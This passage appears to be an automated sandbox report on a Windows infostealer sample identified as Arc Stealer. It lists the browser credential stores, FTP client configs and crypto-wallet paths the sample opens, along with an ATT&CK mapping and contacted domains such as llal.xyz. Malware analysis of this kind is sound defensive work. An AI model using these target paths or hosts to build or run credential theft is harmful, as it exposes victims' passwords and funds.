          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0086F990 rdtsc 1_2_0086F990
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009002E4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_009002E4
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F87E0 LoadLibraryW,GetProcAddress,TryAcquireSRWLockExclusive,ReleaseSRWLockExclusive,1_2_008F87E0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0594049B mov edx, dword ptr fs:[00000030h]1_2_0594049B
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_05940A5B mov eax, dword ptr fs:[00000030h]1_2_05940A5B
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_05940E0B mov eax, dword ptr fs:[00000030h]1_2_05940E0B
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059410AA mov eax, dword ptr fs:[00000030h]1_2_059410AA
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059410AB mov eax, dword ptr fs:[00000030h]1_2_059410AB
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00834B20 GetProcessHeap,HeapAlloc,1_2_00834B20
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009002E4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_009002E4
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00866740 SetUnhandledExceptionFilter,1_2_00866740
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00900D89 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00900D89
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0091399F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0091399F
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00900456 cpuid 1_2_00900456
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00922707
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,1_2_0091E83C
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: EnumSystemLocalesW,1_2_00922958
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00922A00
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,1_2_00922CC0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: EnumSystemLocalesW,1_2_00922C53
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: EnumSystemLocalesW,1_2_00922D95
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,1_2_00922DE0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00922E87
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: EnumSystemLocalesW,1_2_0091EE2D
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,1_2_00922F8D
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00878530 GetModuleHandleW,GetProcAddress,GetSystemTimeAsFileTime,1_2_00878530
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0091688D GetTimeZoneInformation,1_2_0091688D
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0089AD80 __Init_thread_header,GetVersionExW,GetProductInfo,__Init_thread_header,GetNativeSystemInfo,1_2_0089AD80

          Stealing of Sensitive Information

          barindex
          Yara detected Arc Stealer
          Source: Yara matchFile source: Process Memory Space: 0x001900000002ab40-59.exe PID: 7584, type: MEMORYSTR
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "\\Roaming\\Electrum\\wallets",
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "\\Roaming\\ElectronCash\\wallets",
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\*\*
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "f": [ "app-store.json", "simple-storage.json", "*finger-print*", "window-state.json" ],
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "f": [ "exodus.conf.json", "window-state.json", "passphrase.json", "seed.seco", "info.seco" ],
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.000000000828F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\*
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\Exodus
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "\\Roaming\\Ethereum",
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\Coinomi\Coinomi\wallets
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "\\Roaming\\MultiDoge",
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725830139.000000000830C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\Ledger Live
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Notepad++\plugins\config\NppFTP\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\FTP Now\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Program Files (x86)\DeluxeFTP\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\UltraFXP\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtp\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\FTPBox\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Program Files (x86)\GoFTP\settings\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\BBQCoin\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Megacoin\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Mincoin\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Namecoin\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Primecoin\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Terracoin\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
          Source: Yara matchFile source: 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.1722996754.00000000082AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1725697054.00000000082AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 0x001900000002ab40-59.exe PID: 7584, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Arc Stealer
          Source: Yara matchFile source: Process Memory Space: 0x001900000002ab40-59.exe PID: 7584, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Masquerading          		2
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Deobfuscate/Decode Files or Information          		LSASS Memory31
          Security Software Discovery          		Remote Desktop Protocol4
          Data from Local System          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
          Obfuscated Files or Information          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS2
          File and Directory Discovery          		Distributed Component Object ModelInput Capture14
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets25
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          0x001900000002ab40-59.exe11%ReversingLabs
          0x001900000002ab40-59.exe20%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          steamcommunity.com0%VirustotalBrowse
          llal.xyz0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://player.vimeo.com0%URL Reputationsafe
          https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
          https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&amp;l=engl0%URL Reputationsafe
          http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
          https://www.youtube.com0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=english0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
          https://steam.tv/0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
          http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
          https://store.steampowered.com/points/shop/0%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          https://download.cdn.yandex.net/browser/installer/alice/scenarios/0%VirustotalBrowse
          https://sketchfab.com0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://lv.queniujq.cn0%URL Reputationsafe
          https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
          https://www.youtube.com/0%URL Reputationsafe
          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
          https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
          https://checkout.steampowered.com/0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
          https://store.steampowered.com/;0%URL Reputationsafe
          https://store.steampowered.com/about/0%URL Reputationsafe
          https://help.steampowered.com/en/0%URL Reputationsafe
          https://store.steampowered.com/news/0%URL Reputationsafe
          https://community.akamai.steamstatic.com/0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
          https://recaptcha.net/recaptcha/;0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=MO4-iGQJS3Kg&amp;l=en0%VirustotalBrowse
          https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
          https://steamcommunity.com/profiles/76561199619938930/inventory/0%VirustotalBrowse
          https://duckduckgo.com/ac/?q=0%VirustotalBrowse
          https://storage.ape.yandex.net/get/browser/install0%VirustotalBrowse
          https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d0%VirustotalBrowse
          https://steamcommunity.com/login/home/?goto=profiles%2F765611996199389300%VirustotalBrowse
          https://www.google.com0%VirustotalBrowse
          https://browser.yandex.0%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=ttNb0%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=english0%VirustotalBrowse
          https://download.cdn.yandex.net/browser/installer/0%VirustotalBrowse
          https://steamcommunity.com/profiles/765611996199389300%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%VirustotalBrowse
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
          https://llal.xyz/0%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          steamcommunity.com
          		104.102.42.29
          		truefalseunknown
          llal.xyz
          		188.114.97.3
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dfalseunknown
          https://steamcommunity.com/profiles/76561199619938930falseunknown
          https://llal.xyz/Upfalse
            		unknown
            https://llal.xyz/Up/bfalse
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://download.cdn.yandex.net/browser/installer/alice/scenarios/0x001900000002ab40-59.exefalseunknown
              https://duckduckgo.com/chrome_newtab0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://player.vimeo.com0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=MO4-iGQJS3Kg&amp;l=en0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalseunknown
              https://duckduckgo.com/ac/?q=0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://community.akamai.st0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://steamcommunity.com/profiles/76561199619938930/inventory/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalseunknown
                https://steamcommunity.com/?subsection=broadcasts0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalseunknown
                https://yandex.Arial(0x001900000002ab40-59.exefalse
                  		unknown
                  https://store.steampowered.com/subscriber_agreement/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.gstatic.cn/recaptcha/0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&amp;l=engl0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://storage.ape.yandex.net/get/browser/install0x001900000002ab40-59.exefalseunknown
                  https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://www.valvesoftware.com/legal.htm0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.youtube.com0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119961993893076561199619938930[1].htm.1.drfalseunknown
